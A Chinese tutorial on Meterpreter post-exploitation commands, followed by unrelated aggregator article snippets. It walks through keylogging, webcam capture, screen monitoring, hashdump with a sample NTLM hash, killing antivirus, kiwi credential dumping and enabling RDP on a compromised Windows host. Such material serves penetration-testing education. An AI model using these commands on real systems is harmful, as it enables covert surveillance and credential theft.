Metapreter 详细教程--进阶教程

常用命令

基本命令

命令说明
sysinfo查看系统信息
ls列出目录或文件夹
pwd获取当前目录地址
cd切换目录,注意这里的win系统需要用用两个反斜杠来分割(cd c:\windows\system32 )
help帮助
getuid查看当前用户是谁
getpid查看当前进程号
ps查看所有进程
background将当前会话放入后台运行
shell获取一个交互式shell
sessions列出当前可以用的会话列表同show sessions 一样
sessions -i <序号>切换到指定序号的会话到前台来
quit关闭meterpreter会话
irb获取系统配置信息的结果

sysinfo 查看系统信息
在这里插入图片描述
ls 列出当前目录
在这里插入图片描述
pwd 显示当前位置地址
在这里插入图片描述
help 帮助
在这里插入图片描述
getuid 查看当前用户
在这里插入图片描述
getpid 查看当前进程号
在这里插入图片描述
ps 查看当前所有进程
在这里插入图片描述
background 将当前会话切换到后台运行
在这里插入图片描述
sessions 列出当前可以用的会话
在这里插入图片描述
sessions -i 1 将选择的会话切换到前台来

在这里插入图片描述
quit 退出
在这里插入图片描述

文件系统命令

命令说明
mkdir创建文件夹
cat查看文件内容
rmdir删除文件夹
cp复制文件
mv移动文件或重命名文件
edit编辑或创建文件
rm删除文件
download <文件名称>下载文件
upload <文件名称>上传文件
ipconfig/ifconfig查看网络配置
search -f <文件名称(支持通配符)>搜索文件
以上命令前面加个 "l" 代表对本地系统进行操作

mkdir test 创建文件

在这里插入图片描述
edit test/test.txt 创建文件或编辑文件

在这里插入图片描述
cat test.txt 查看文件内容
在这里插入图片描述
cp test.txt test2.txt 文件复制

在这里插入图片描述
rm test2.txt 删除文件

在这里插入图片描述
search -f test* 搜索文件支持通配符
在这里插入图片描述
download test.txt 下载文件
在这里插入图片描述
upload -r /tmp/nc.txt c:/test/nc.exe 上传文件
在这里插入图片描述

用户控制和监视

命令说明
uictl enable keyboard启用键盘
uictl enable mouse启用鼠标
uictl disable keyboard禁用键盘
uictl disable mouse禁用鼠标
webcam_list查看摄像头
webcam_snap通过摄像头拍照
webcam_stream通过摄像头开启视频
run getgui -e开启远程桌面
screenshot抓屏
screenshare实时监控桌面
keyscan_start开启键盘记录
keyscan_dump导出键盘记录
keyscan_stop停止键盘记录
migrate线程迁移

screenshot 抓屏
在这里插入图片描述
在这里插入图片描述
screenshare 实时监控屏幕
在这里插入图片描述

在这里插入图片描述

键盘记录

在开启键盘记录的时候需要先确当当前的用户是谁,因为记录只会记录当前用用户

在这里插入图片描述

我们发现是system权限,但是我们要的权限是LivingOnHope的权限,这是我们需要切换到LivingOnHope的进程中去通过migrate 命令执行,这里我们选择explorer.exe进程,这个进程是windows的外壳程序(管理桌面的程序如果关闭桌面将啥也没有了)
migrate 2476
在这里插入图片描述
在这里插入图片描述
keyscan_start 开启键盘记录
keyscan_dump 下载记录内容
keyscan_stop 停止键盘记录

在这里插入图片描述
在这里插入图片描述

execute 执行文件命令

参数说明
-h帮助
-H后台运行
-i执行后与进程进行交流
-d在目标主机执行时显示的进程名称(作为装用)
-m直接从内存中运行
-a执行命令需要的参数

execute -H -i -f cmd.exe

hashdump 获取密码HASH

windows的密码文件存放路径 C:\Windows\System32\config\SAM 密码存放在SAM文件中,在老的windows系统中用的是LM 加密方式 在新的系统中如win10win11等系统都是采用NTLM加密

在这里插入图片描述

Administrator:500:C8825DB10F2590EAAAD3B435B51404EE:683020925C5D8569C23AA724774CE6CC:::
用户名称为:Administrator
RID为:500
LM-HASH值为:C8825DB10F2590EAAAD3B435B51404EE
NT-HASH值为:683020925C5D8569C23AA724774CE6CC

HASH解析网站

在这里插入图片描述

run killav 关闭杀毒软件

run kilav 关闭杀毒软件(在关闭杀毒软件的同时也会关闭cmd,这个命令可能会造成系统死机的情况)

这里因为win7没有杀毒软件所有是found
在这里插入图片描述

检测是否运行在虚拟机

run post/windows/gather/checkvm
在这里插入图片描述

枚举当前登录的用户

un post/windows/gather/enum_logged_on_users
在这里插入图片描述

mimikatz和KiWi

在msf6中mimikatz已经被kiwi所取代了,必须是system来运行

load mimikatz 将mimikatz模块加入到metapreter中(因为mimikatz已经被kiwi所替代所有输入这个命令加载的也是kiwi)

load 加载模块
在这里插入图片描述
在这里插入图片描述
creds_all 获取所有凭证(在win7及其以下的版本是可以直接获取到当前登录人输入的登录口令的,win10及其以上的版本是不能直接获取到的,只能获取到HASH密码)
在这里插入图片描述

开启远程桌面

run post/windows/manage/enable_rdp
在这里插入图片描述
rdesktop 172.30.1.133

kali 中的一个远程桌面工具
在这里插入图片描述

在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mfbz.cn/a/279666.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

API 开放平台项目(已整理,已废弃)

项目大纲 前端 React 18Ant Design Pro 5.x 脚手架Ant Design & Procomponents 组件库Umi 4 前端框架OpenAPI 前端代码生成 后端 Java Spring BootMySQL 数据库MyBatis-Plus 及 MyBatis X 自动生成API 签名认证&#xff08;Http 调用&#xff09;Spring Boot Starter&#…

数据库——简单查询复杂查询

1.实验内容及原理 1. 在 Windows 系统中安装 VMWare 虚拟机&#xff0c;在 VMWare 中安装 Ubuntu 系统,并在 Ubuntu 中搭建 LAMP 实验环境。 2. 使用 MySQL 进行一些基本操作&#xff1a; &#xff08;1&#xff09;登录 MySQL&#xff0c;在 MySQL 中创建用户&#xff0c;…

OpenCV-Python(22):直方图的计算绘制与分析

目标 了解直方图的原理及应用使用OpenCV 或Numpy 函数计算直方图使用Opencv 或者Matplotlib 函数绘制直方图学习函数cv2.calcHist()、np.histogram()等 原理及应用 直方图是一种统计图形&#xff0c;是对图像的另一种解释&#xff0c;用于表示图像中各个像素值的频次分布。直…

机器学习归一化和标准化

1. 为什么做归一化和标准化 样本中有多个特征&#xff0c;每一个特征都有自己的定义域和取值范围&#xff0c;他们对距离计算也是不同的&#xff0c;如取值较大的影响力会盖过取值较小的参数。因此&#xff0c;为了公平&#xff0c;样本参数必须做一些归一化处理&#xff0c;将…

UI演示双视图立体匹配与重建

相关文章&#xff1a; PyQt5和Qt designer的详细安装教程&#xff1a;https://blog.csdn.net/qq_43811536/article/details/135185233?spm1001.2014.3001.5501Qt designer界面和所有组件功能的详细介绍&#xff1a;https://blog.csdn.net/qq_43811536/article/details/1351868…

如何理解李克特量表?选项距离相等+题目权重相等!

在学术研究中&#xff0c;通过开展问卷调查获取数据时&#xff0c;调查问卷分为量表题和非量表题。量表题就是测试受访者的态度或者看法的题目&#xff0c;大多采用李克特量表。 李克特量表是一种评分加总式态度量表&#xff08;attitude scale&#xff09;&#xff0c;由美国…

论文阅读——Slide-Transformer(cvpr2023)

Slide-Transformer: Hierarchical Vision Transformer with Local Self-Attention 一、分析 1、改进transformer的几个思路&#xff1a; &#xff08;1&#xff09;将全局感受野控制在较小区域&#xff0c;如&#xff1a;PVT&#xff0c;DAT&#xff0c;使用稀疏全局注意力来…

山西电力市场日前价格预测【2023-12-28】

日前价格预测 预测说明&#xff1a; 如上图所示&#xff0c;预测明日&#xff08;2023-12-28&#xff09;山西电力市场全天平均日前电价为814.30元/MWh。其中&#xff0c;最高日前电价为1500.00元/MWh&#xff0c;预计出现在08:00~08:45,17:00~20:15。最低日前电价为394.61元/…

FairyGUI-Cocos Creator官方Demo源码解读

博主在学习Cocos Creator的时候&#xff0c;发现了一款免费的UI编辑器FairyGUI。这款编辑器的能力十分强大&#xff0c;但是网上的学习资源比较少&#xff0c;坑比较多&#xff0c;主要学习方式就是阅读官方文档和练习官方Demo。这里博主进行官方Demo的解读。 从gitee上克隆项目…

Java多线程<二>多线程经典场景

leetcode 多线程刷题 上锁上一次&#xff0c;还是上多次&#xff1f; 同步的顺序。 1. 交替打印字符 使用sychronize同步锁使用lock锁使用concurrent的默认机制使用volitale关键字 Thread.sleep() / Thread.yield机制使用automic原子类 方式1 &#xff1a;使用互斥访问st…

Linux上管理不同版本的 JDK

当在 Linux 上管理不同版本的 JDK 时&#xff0c;使用 yum 和 dnf 可以方便地安装和切换不同的 JDK 版本。本文将介绍如何通过这两个包管理工具安装 JDK 1.8 和 JDK 11&#xff0c;并利用软连接动态关联这些版本。 安装 JDK 1.8 和 JDK 11 使用 yum 安装 JDK 1.8 打开终端并…

Linux 内存数据 Metrics 指标解读

过去从未仔细了解过使用 free、top 等命令时显式的内存信息&#xff0c;只关注了已用内存 / 可用内存。本文我们详解解读和标注一下各个数据项的含义&#xff0c;同时和 Ganglia 显式的数据做一个映射。开始前介绍一个小知识&#xff0c;很多查看内存的命令行工具都是 cat /pro…

Pytorch框架基础

参考资料 pytorch框架基础 Pycharm 页面卡住解决方案 使用ps命令结合grep来查找PyCharm相关的进程 ps aux | grep pycharm kill -9 [PID]关于怎么找这个卡住的进程&#xff0c;据初步观察&#xff0c;卡住进程打印的信息是最长的&#xff0c;此外&#xff0c;在卡住进程的打…

贪心算法—会议安排

与其明天开始&#xff0c;不如现在行动&#xff01; 文章目录 1 安排会议1 题目描述2 解决思路3 代码实现 &#x1f48e;总结 1 安排会议 1 题目描述 一些项目要占用一个会议室宣讲&#xff0c;会议室不能同时容纳两个项目的宣讲。 给你每一个项目开始的时间和结束的时间 你来…

MendelianRandomization | 孟德尔随机化神包更新啦!~(一)(小试牛刀)

1写在前面 今天发现MendelianRandomization包更新v0.9了。&#x1f61c; 其实也算不上更新。&#x1fae0; 跟大家一起分享一下这个包做MR的用法吧。&#x1f929; 还有一个包就是TwoSampleMR&#xff0c;大家有兴趣可以去学一下。&#x1f605; 2用到的包 rm(list ls())# ins…

壮志酬筹>业务被裁>副业转正>收入回正。一个前黑马程序员老师的2023

从年初时的踌躇满志&#xff0c;到年中时整个业务线被砍。全职做前端训练营&#xff0c;四个多月的时间帮助100多名同学拿到了满意的offer&#xff0c;同时也让我的收入重归正轨。仅以这个视频记录我&#xff0c;一个普通程序员的 2023 。 视频版可直接访问 Hello&#xff0c;大…

【年度征文】回顾2023,迎接2024

转眼一年~~2023又到年底了&#xff0c;CSDN年度征文如约而至&#xff01;不知不觉又在CSDN平台写了488篇博文&#xff0c;非常感谢CSDN提供的平台&#xff0c;同时也感谢关注和支持博主的粉丝们&#xff0c;在马上到来新的一年里&#xff0c;我会继续努力&#xff01;也非常感谢…

mysql突然找不到,任务管理器里也没有了(图文详细解决)

右键开始键&#xff0c;选终端&#xff08;管理员&#xff09; 2.点↓的命令提示符&#xff0c;进到以管理员打开命令指示符 3.输入命令&#xff1a; mysqld.exe -install 如果出现这个Service successfully installed. 就代表成功了 4.输入&#xff1a; net start mysql MySO…

如何解决“电脑缺失msvcp110.dll”错误,msvcp110.dll文件解决方法

“msvcr110.dll丢失”。那么&#xff0c;msvcr110.dlll丢失到底是什么意思呢&#xff1f;它对我们的电脑有什么影响&#xff1f;本文将详细介绍msvcr110.dll的作用以及msvcr110.dll丢失对电脑的影响&#xff0c;并提供5个解决方案来解决这个问题。 一、msvcr110.dll的作用 ms…

【三维目标检测/自动驾驶】IA-BEV:基于结构先验和自增强学习的实例感知三维目标检测(AAAI 2024)

系列文章目录 论文&#xff1a;Instance-aware Multi-Camera 3D Object Detection with Structural Priors Mining and Self-Boosting Learning 地址&#xff1a;https://arxiv.org/pdf/2312.08004.pdf 来源&#xff1a;复旦大学 英特尔Shanghai Key Lab /美团 文章目录 系列文…
最新文章